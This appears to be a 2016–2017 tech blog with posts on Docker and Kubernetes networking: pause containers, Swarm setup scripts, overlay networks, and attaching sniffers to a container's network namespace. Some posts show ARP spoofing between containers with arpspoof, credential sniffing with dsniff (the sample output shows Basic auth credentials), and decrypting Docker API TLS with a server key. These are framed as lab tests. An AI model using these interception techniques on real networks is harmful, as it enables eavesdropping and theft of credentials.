Saturday, March 4, 2017

#Docker containers versus #K8S pod

#Docker containers versus #K8S pod

I’m writing this small article for all you #docker, #kubernetes and #real_hackers in order to understand how K8S pods and docker containers relate.

All my testing has been done on a small K8S cluster that is easily created via Google Cloud Engine. There are a lot’s of tutorials around to get things started.

Once you have a cluster, you can deploy a simple pod like this through means of kubeclt (example from https://kubernetes.io/docs/tasks/kubectl/get-shell-running-container/)

kubectl create -f https://k8s.io/docs/tasks/kubectl/shell-demo.yaml
 
 
Verify if the pod is started, which IP was assigned and what node of the cluster we’re using:
kubectl get pods -o wide

Well now, SSH into the K8S node via the console. You can identify the node from previous command (Remember, kubectl is talking to the K8S master node). Once you have a console on the respective node:
 
docker ps

The output will show quite a lot of containers, but identify the ones containing “shell-demo”
 
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
6aefa4147d06 nginx “nginx -g ‘daemon off” About an hour ago Up About an hour 
 k8s_nginx.6e1f6ec8_shell-demo_default_e9e26eef-0006–11e7-aded-42010a8001be_8f315325
 
3cb9ae6edfee gcr.io/google_containers/pause-amd64:3.0 “/pause” About an hour ago Up About an hour 
 k8s_POD.d8dbe16c_shell-demo_default_e9e26eef-0006–11e7-aded-42010a8001be_4c955228


When you look carefully, there are 2 containers running. A container running ‘pause’ as one running our nginx image (specified in shell-demo.yaml)


The cr.io/google_containers/pause-amd64:3.0 is actually a container doing very little, except providing the namespaces (Process, Network, Mount, Hostname, Shared Memory)

In K8S, containers that are related together are organized in pods. All containers share the same network namespace and so the IP address. So how is this organized?

When a pod is created, the 3cb9ae6edfee gcr.io/google_containers/pause-amd64:3.0 container is started. It acquires an IP address from the K8S overlay network. Once this container is active, our demo-shell app (nginx) container is started in a particular way, probably something similar to
 
docker run -d --net container:id_of_pause_container --ipc container:id_of_pause_container nginx

So could we add a container and link it to the pod? Let’s figure out the IP address of the pod.
 
kubectl get pods -o wide

Now lets run a tcpdump container that will link to pod (see https://medium.com/@xxradar/how-to-tcpdump-effectively-in-docker-2ed0a09b5406) to build it and for more options.
 
 
docker run -it --net=container:id_of_pause_container tcpdump
 
ex. docker run -it --net=container:3cb9ae6edfee tcpdump
tcpdump: verbose output suppressed, use -v or -vv for full protocol decodelistening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
13:25:59.239352 IP 10.128.0.2.49046 > 10.0.0.7.80: Flags [S], seq 3950690280, win 28400, options [mss 1420,sackOK,TS val 9598868 ecr 0,nop,wscale 7], length 0
13:25:59.239393 IP 10.0.0.7.80 > 10.128.0.2.49046: Flags [S.], seq 3158946458, ack 3950690281, win 28160, options [mss 1420,sackOK,TS val 9599163 ecr 9598868,nop,wscale 7], length 0
13:25:59.239947 IP 10.128.0.2.49046 > 10.0.0.7.80: Flags [.], ack 1, win 222, options [nop,nop,TS val 9598869 ecr 9599163], length 0
13:25:59.239977 IP 10.128.0.2.49046 > 10.0.0.7.80: Flags ...

Some other tricks
 
ex. docker run -it --net=container:3cb9ae6edfee busybox ifconfig
eth0      Link encap:Ethernet  HWaddr 0A:58:0A:00:00:07 
inet addr:10.0.0.7  Bcast:0.0.0.0  Mask:255.255.255.0 
inet6 addr: fe80::cd7:6ff:fe31:6442/64 Scope:Link ...
 
 
ex. docker run -it --net=container:3cb9ae6edfee busybox netstat -a
Active Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address         State 
tcp        0      0 0.0.0.0:80              0.0.0.0:*    
  
I think it is even possible the share the process namespace
 
docker run -it --net=container:3cb9ae6edfee --pid=host busybox ps

The previous example shares the process namespace of the entire host and it seems to work, but this next example fails, I think due to a bug in Docker v1.11. It should be solved in a later version of docker.
 
docker run -it --net=container:3cb9ae6edfee --pid=container:3cb9ae6edfee busybox

So … learn docker the hard way !! K8S is a very cool solution, as well as SWARM in my opinion, but it use among other things, containers in ‘special’ way. For my understanding, K8S adds a lot of features and does things differently, but when you boil down to the container level you will understand the magic !

Thursday, January 26, 2017

ARP spoofing Docker containers


ARP spoofing is a relatively old hacking technique to intercept traffic on switched/bridged networks. It is essentially a mechanism to poison the ARP cache used by systems to find the MAC address of a certain host. Google searches will yield lots of information about the topic if you need further reading.

This write up is simply to validate whether the technique is still valid in containerized environments.

So let’s create a test environment to proof the point.

docker-machine create \
--driver digitalocean \
--digitalocean-access-token=d68aa…65b14e \
spooftest

Open a few terminals to make the testing easy

docker-machine ssh spooftest

On terminal 1, create the required containers
# docker build -t arpspoof - <<EOF
FROM debian
RUN apt-get update && apt-get install -y dsniff
EOF

# docker build -t tcpdump - <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y tcpdump
CMD tcpdump -i -n eth0
EOF

On terminal 2, create a busybox container named box1
# docker run -it --name box1 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:04
          inet addr:172.17.0.4  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:508 (508.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ #

On terminal 3, create a busybox container named box2
# docker run -it --name box2 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:05
          inet addr:172.17.0.5  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:418 (418.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ # ping 172.17.0.4

On terminal 1, launch the arpspoof attack
# docker run -it --name arpspoofer arpspoof
arpspoof -i eth0  -t 172.17.0.5 172.17.0.4 &
arpspoof -i eth0  -t 172.17.0.4 172.17.0.5 &

On terminal 4, launch a tcpdump to verify the arpsoof taking place
docker run -it --name tcpdumper --net=container:arpsoofer  tcpdump

Traffic should be relayed through the arpspoof container!

Monday, January 16, 2017

Networking update on DOCKER 1.13.0-rc6 (beta)

As pointed out in me previous blog post, it was not possible to connect containers to a SWARM OVERLAY network used by the service. 

Docker v1.13 introduces the --attachable flag for network creation.

You can now create networks as follows:
docker network create --attachable --driver overlay net-1

Creating a service did not change, so:
docker service create  --name nginx --network net-1 --replicas 3  -p 80:80  nginx

Instead of running your test containers as a service or using other fancy tricks, we now can simply test by:
docker run -it --rm --network net-1 xxradar/hackon ping nginx

Happy testing !



Tuesday, September 20, 2016

Update Getting started with Docker Version 1.12.1

Update on  Getting started with Docker  Version 1.12.1


Few things changed after previous post. Certainly the way you deploy docker swarm mode as well few things on the networking side of things.


I therefore share this example script to quickly get started with a new setup and play around.

#!/bin/bash
docker-machine ls




#create 1st manager node


docker-machine create -d virtualbox manager1
eval $(docker-machine env manager1)
docker swarm init --advertise-addr $(docker-machine ip manager1)
docker swarm join-token -q manager > manager-token.txt
docker swarm join-token -q worker > worker-token.txt
 

#create 2nd and 3th manager nodes


for N in 2 3; do
docker-machine create -d virtualbox manager$N
eval $(docker-machine env manager$N)
docker swarm join --token $(cat manager-token.txt) $(docker-machine ip manager1)
done

#create 4 to 7 worker nodes

for N in `seq 1 4`; do
docker-machine create -d virtualbox worker$N
eval $(docker-machine env worker$N)
docker swarm join --token $(cat worker-token.txt) $(docker-machine ip manager1)
done

eval $(docker-machine env manager1)
docker service create --name nginx -p 80:80 --replicas 20 nginx
docker service create --name nginx2 --constraint node.role==worker \

  -p 8080:80 \
  --replicas 5  nginx


Please note that it is not possible anymore to connect "non"-service containers to the overlay networks anymore as indicated in the previous post.

A trick to test the overlay network can be to spin up a service in which you install your debugging tools or to link a container as follows for example:


docker run -it --net=container:id_of_a_service_container xxradar/hackon


Tuesday, June 21, 2016

Getting started with Docker RC 1.12

Docker RC 1.12 is available and introduces some new features that will make things more easy ... but sometimes need some explanation :-) 

This set of commands will create a SWARM setup that is (according the documentation) fully secured using virtualbox
 
To create the vm's
docker-machine create -d virtualbox test112
docker-machine create -d virtualbox test112n1
docker-machine create -d virtualbox test112n2

Starting the vm's
docker-machine start test112
docker-machine start test112n1
docker-machine start test112n2


Setting of Swarm on the master node
eval $(docker-machine env test112)
docker swarm init --listen-addr $(docker-machine ip test112):2377


Setting of Swarm on worker node1
eval $(docker-machine env test112n1)
docker swarm init --listen-addr $(docker-machine ip test112):2377


Setting of Swarm on worker node2
eval $(docker-machine env test112n2)
docker swarm init --listen-addr $(docker-machine ip test112):2377
You can verify your setup
eval $(docker-machine env test112)
docker node ls


mymachine$ docker node ls
ID                           NAME       MEMBERSHIP  STATUS  AVAILABILITY  MANAGER STATUS
5bvk0htdkyv9ksddzsy3wgnn6    test112n2  Accepted    Ready   Active       
6dq3g4jtiak27pd56mpk06stx    test112n1  Accepted    Ready   Active       
e234397csi7wlt5dbj2ksu9qp *  test112    Accepted    Ready   Active        Leader





You can now create an overlay network
docker network create --driver=overlay my-net


And now your start the service ...
docker service create --replicas 1 --network  my-net --name nginx nginx
 
... and now you can scale !
docker service scale nginx=5

If you plan to try-out the new load-balancing feature, use -p flag
docker service create --replicas 5 --network  my-net --name -p 8888:80 nginx2 nginx


Note that in this case your services will be automatically distributed over all 3 nodes. On every node, port 8888, will be mapped to all the tasks(of the service to use the lingo :-)). (by default on Mac this is 192.168.99.100, 192.168.99.101, etc)
 
Because we use an overlay network, requests that are send to node1 on 192.168.99.100:8888 for example can also be distributed via the container overlay to all other nodes. You can check this by using the docker logs containerid

Another thing I noticed is that you cannot connect a container to a swarm scoped overlay directly.

So this will NOT work: docker run -it --net=my-net xxradar/hackon

Although, you can run docker run -it xxradar/hackon and link the container to the network like docker network connect my-net containerid


Have fun exploring !!

 
 

Monday, June 13, 2016

  Analyzing container network traffic ... using other containers !


Containers can use the network stack in a few different ways:

- none
- docker bridge (or user defined networks and overlays)
- host (shares the network stack of the docker host)
- container networks (ex. docker run --net container:id ...)

Building a container and run good old tools like tcpdump or ngrep, or for the old-school hackers, dsniff, urlsnarf, etc... would not yield much interesting information, because you link the container to the default bridge network.

On the other, you can link you container to the host network --net=host or even to --net=container:id. In this case you can basically sniff the traffic from the entire host, or a specific container !


To build a container that runs dsniff is pretty simple. Take this Dockerfile:


FROM debian
RUN apt-get update && apt-get install -y dsniff
CMD dsniff -i eth0 -m


and build it like
docker build -t xxradar/dsniffcon .

You can now link the container to --net=host
docker run -it --net=host xxradar/dsniffcon 

root@host:~/dsniffcon# docker run -it --net=host xxradar/dsniffcon
dsniff: listening on eth0
-----------------
06/13/16 19:58:40 tcp 12.97.16.194.9143 -> www.foo.com.80 (http)
GET / HTTP/1.1
Host:
www.foo.com
Authorization: Basic dGVzdDp0ZXN0cHc= [test:testpw] 


or to specific container (ex. a nginx container)

root@host::~/dsniffcon# docker run -it --net=container:a51ba... xxradar/dsniffcon
dsniff: listening on eth0
-----------------
06/13/16 20:00:56 tcp 12.97.16.194.5288 -> a51414ba0ff9.80 (http)
GET / HTTP/1.1
Host: www.foo.com
Authorization: Basic dGVzdDp0ZXN0cHc= [test:testpw]


 
 



 

Monday, June 6, 2016

Decoding TLS DOCKER API with WireShark @Dockersec

Open Wireshark
  --> preferences
   --> protocols
     --> ssl


Edit RSA keys list
  --> IP address IP address of your docker API or Docker Swarm API
  --> Port  typically port 2376 or 3376 for Swarm
  --> Protocol http
  --> Key File  /Users/username/.docker/machine/machines/docker-host/server-key.pem
      (you might need to copy the key to an accessible location)


Start Wireshark
Capture on vboxnet5 if you are using Virtualbox

Run a docker command !!
ex. docker ps